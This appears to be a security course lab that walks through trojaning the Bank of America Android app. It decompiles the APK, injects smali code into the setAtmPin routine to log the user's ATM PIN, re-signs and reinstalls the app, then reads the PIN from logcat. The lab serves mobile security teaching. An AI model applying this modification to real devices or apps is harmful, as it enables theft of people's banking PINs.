Archived Copy
If they update the app, and you want the instructions below to work exactly as written, use this archived copy.
adb shell pm list packages bof
adb shell pm path com.infonow.bofa
adb pull /data/app/com.infonow.bofa-1.apk
The file downloads into Kali,
as shown below.
apktool d -f -r com.infonow.bofa-1.apk
The file unpacks, as shown below.
grep setAtmPin -r .
The module we want to modify appears,
highlighted in the image below.
On your Kali machine, execute this command:
nano ./com.infonow.bofa-1/smali_classes5/com/bofa/ecom/servicelayer/model/MDAUserVerificationDetails.smali
In nano, press Ctrl+W
Enter the search string setAtmPin as shown below.
Press Enter to perform the search.
The routine that gathers the user's ATM card PIN appears, as shown below.
Here's a block of code to copy and paste to help you. Don't forget to change .locals to 2 also.
# TROJAN
const-string v1, "TROJAN_BofA: PIN:"
invoke-static {v1, p1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
# END TROJAN
Type Ctrl+X, Y, Enter to save the file.
apktool b com.infonow.bofa-1
There was a "brut.common" error at
the end,
as shown below,
but it seems OK to just ignore it.
Troubleshooting
If apktool returns errors, as shown below:I think this error comes from a Java version conflict.
The simplest fix I found is to just extract a fresh Kali 2019.1 64-bit VM and use it instead of a machine that has been used for other projects.
Use the apktool that comes with Kali, and add adb with these commands:
If you get a "E: Could not get lock /var/lib/dpkg/lock-frontend" error, restart Kali.
apt update apt install android-tools-adb -y
Execute this command:
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
A prompt asks for a "keystore password". Enter
password twice.
Then a series of question asks for your name, etc. You can press Enter for each question except the last one, which you must answer yes to, as shown below.
jarsigner -sigalg SHA1withRSA \
-digestalg SHA1 -keystore my-release-key.keystore \
com.infonow.bofa-1/dist/com.infonow.bofa-1.apk alias_name
Enter the password of password when you
are prompted to.
The app is signed, as shown below.
adb install com.infonow.bofa-1/dist/com.infonow.bofa-1.apk
The process succeeds,
as shown below.
If the Bank of America app launches, but cannot connect to the Internet, do these steps:
You will also have to restart the port forwarding (possibly "socat") and reconnect Kali with "adb connect".
adb logcat | grep -i bofa
The terminal pauses, waiting for matching
log entries, as shown below.
The PIN appears in the log, as shown below.
Find the text covered by a green box in the image above. Enter it into the form below to record your success.